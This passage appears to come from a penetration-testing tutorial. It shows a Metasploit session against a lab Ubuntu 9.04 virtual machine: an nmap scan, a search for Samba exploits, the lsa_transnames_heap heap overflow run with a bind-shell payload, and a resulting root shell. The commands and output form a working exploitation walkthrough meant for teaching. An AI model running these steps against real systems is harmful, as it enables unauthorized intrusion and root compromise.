Exploiting an Ubuntu Machine

Let’s try a different exploit on an Ubuntu 9.04 virtual machine. The steps are pretty much the same as for the preceding exploit except that we will select a different payload.

msf > nmap -sT -A -P0 192.168.33.132
[*] exec: nmap -sT -A -P0 192.168.33.132

Starting Nmap 5.20 ( http://nmap.org ) at 2011-03-15 19:35 EDT
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.33.132
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1) 
|_html-title: Index of /
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME) 
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
MAC Address: 00:0C:29:21:AD:08 (VMware)
No exact OS matches for host (If you know what OS is running
 on it, see http://nmap.org/submit/ ).

. . . SNIP . . .

Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Unix (Samba 3.0.24)
|   Name: MSHOMEUnknown
|_  System time: 2011-03-15 17:39:57 UTC-4

OS and Service detection performed. Please report any incorrect
 results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.11 seconds

We see three open ports: 80, 139, and 445. The message at tells us that the system is running Ubuntu, and at we see that it is running a version of Samba 3.x and Apache 2.2.3 with PHP 5.2.1.

Let’s search for a Samba exploit and try it against the system:

msf > search samba
[*] Searching loaded modules for pattern 'samba'...

Auxiliary
=========
   Name                               Rank    Description
   ----                               ----    -----------
   admin/smb/samba_symlink_traversal  normal  Samba Symlink Directory Traversal
   dos/samba/lsa_addprivs_heap        normal  Samba lsa_io_privilege_set Heap Overflow
   dos/samba/lsa_transnames_heap      normal  Samba lsa_io_trans_names Heap Overflow

Exploits
========

   Name                                 Rank       Description
   ----                                 ----       -----------
   linux/samba/lsa_transnames_heap      good       Samba lsa_io_trans_names . . .

. . . SNIP . . .

msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show payloads
Compatible Payloads
===================

   Name                              Rank    Description
   ----                              ----    -----------
   generic/debug_trap                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp         normal  Generic Command Shell, Reverse TCP Inline
   linux/x86/adduser                 normal  Linux Add User
   linux/x86/chmod                   normal  Linux Chmod
   linux/x86/exec                    normal  Linux Execute Command
   linux/x86/metsvc_bind_tcp         normal  Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp      normal  Linux Meterpreter
 Service, Reverse TCP Inline
   linux/x86/shell/bind_ipv6_tcp     normal  Linux Command Shell,
 Bind TCP Stager (IPv6)
   linux/x86/shell/bind_tcp          normal  Linux Command Shell, Bind TCP Stager

. . . SNIP . . .

msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.33.132
RHOST => 192.168.33.132
msf exploit(lsa_transnames_heap) > exploit

[*] Creating nop sled....
[*] Started bind handler
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...

. . . SNIP . . .

[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.33.129:41551 -> 192.168.33.132:8080)
ifconfig
eth1      Link encap:Ethernet  HWaddr 00:0C:29:21:AD:08
          inet addr:192.168.33.132  Bcast:192.168.33.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3178 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2756 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:292351 (285.4 KiB)  TX bytes:214234 (209.2 KiB)
          Interrupt:17 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

whoami
root

This type of exploit, called a heap-based attack, takes advantage of dynamic memory allocation, but it isn’t 100 percent reliable. (You may need to attempt the exploit command a few times if it doesn’t work the first time.)

Notice in this example that we used a bind shell to set up a listener port on the target machine; Metasploit handles the direct connection to the system automatically for us. (Remember to use the reverse payload when attacking through a firewall or NAT.)

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset